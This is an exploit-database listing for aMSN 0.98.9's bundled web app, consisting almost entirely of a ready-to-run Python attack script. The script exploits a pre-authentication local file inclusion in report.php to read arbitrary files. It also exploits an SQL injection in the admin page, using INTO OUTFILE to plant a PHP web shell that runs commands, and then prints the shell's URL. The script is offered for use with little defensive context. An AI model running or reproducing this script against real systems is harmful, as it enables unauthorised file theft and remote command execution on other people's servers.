[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

aMSN 0.98.9 Web App - Multiple Vulnerabilities

Author
drone
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21375
Category
web applications
Date add
14-10-2013
Platform
php
from argparse import ArgumentParser
import urllib2
import string
import random
 
"""
    Preauth LFI and SQLi in the web app packaged with aMSN 0.98.9
"""
 
def lfi(options):
    """ exploit the LFI
    """
    addr = 'http://{0}{1}/bugs/report.php?lang=../../../../../{2}'.format(\
                            options.ip, options.root, options.lfi)
    data = urllib2.urlopen(addr).read().rstrip().split("ERROR")[0]
    print data
 
def run(options):
    """ exploit lfi or sqli
    """
    if options.lfi:
        return lfi(options)
 
    shell = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(5))
    sqli = 'http://{0}{1}/bugs/admin/index.php?show=bug&id='.format(options.ip, options.root)
 
    # ' UNION SELECT '<?php system($_GET['cmd']) ?>,2,3,4,5,6,7,8,9 INTO OUTFILE 'yourshell';-- -
    exploit = '1\'%20UNION%20SELECT%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\',2,3,4,5,6,7,8,9%20'\
              'INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'.format(options.path,shell)
 
    urllib2.urlopen(sqli + exploit)
    print '[!] Shell dropped.  http://%s%s/%s.php?cmd=ls' % (options.ip, options.root, shell)
 
def parse_args():
    parser = ArgumentParser()
    parser.add_argument("-i", help='Server address', action='store', dest='ip', required=True)
    parser.add_argument('-l', help='Local file inclusion', action='store', dest='lfi',
                              metavar='[file]')
    parser.add_argument('-p', help='Path to amsn [/amsn]', action='store', dest='root',
                              default='/amsn')
    parser.add_argument('-w', help='Path to drop shell [/var/www/amsn', dest='path',
                              default='/var/www/amsn')
 
    options = parser.parse_args()
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.root = options.root if options.root[-1] != '/' else options.root[:-1]
    return options
 
if __name__ == "__main__":
    run(parse_args())

#  0day.today [2024-12-25]  #